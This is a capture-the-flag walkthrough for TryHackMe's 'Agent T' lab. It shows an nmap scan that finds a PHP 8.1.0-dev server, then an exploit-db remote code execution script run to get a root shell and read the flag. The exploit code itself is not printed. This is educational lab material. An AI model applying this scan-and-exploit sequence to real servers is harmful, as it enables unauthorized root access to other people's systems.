Agent T TryHackMe Walkthrough

In this article, I will be sharing a walkthrough of Agent T from TryHackMe. This is an easy level machine which includes exploiting a vulnerable version of php installed in the web server to get a root shell. Let's get started!

Agent T TryHackMe Walkthrough

Initial Enumeration

I started the initial enumeration by running a port scan using nmap looking for open ports and running services.

┌──(madhav__kali)-[~/ctf/thm/agentT]
└─$ nmap -sC -sV -oN nmap/initial 10.10.223.96           
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-26 06:40 IST
Stats: 0:00:45 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
Nmap scan report for 10.10.223.96
Host is up (0.20s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    PHP cli server 5.5 or later (PHP 8.1.0-dev)
|_http-title:  Admin Dashboard

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.88 seconds

We have only one HTTP port open which is running a PHP web server. Let's open our web browser and see what's running on the webserver.

I checked the website, it is using a bootstrap theme and does not have much functionality. Next I performed a dirb scan to search for hidden files and directories but it also did not give us anything useful.

From the nmap scan, we know that the website is running a PHP cli server 5.5 or later (PHP 8.1.0-dev). I searched for this version name on google, and found that this version is vulnerable to the remote code execution.

I found this exploit written in python on exploitdb. On executing the exploit, I got a shell were we can execute command as root!

┌──(madhav__kali)-[~/ctf/thm/agentT]
└─$ python3 exploit.py 
Enter the full host url:
http://10.10.223.96/

Interactive shell is opened on http://10.10.223.96/ 
Can't acces tty; job crontol turned off.
$ id
uid=0(root) gid=0(root) groups=0(root)

We have the root shell, now we need to find the flag. I searched for the flag.txt or root.txt and found a flag.txt in the / directory.

$ ls /
bin
boot
dev
etc
flag.txt
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

$ cat /flag.txt
flag{********************************}

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Delphine Wylin.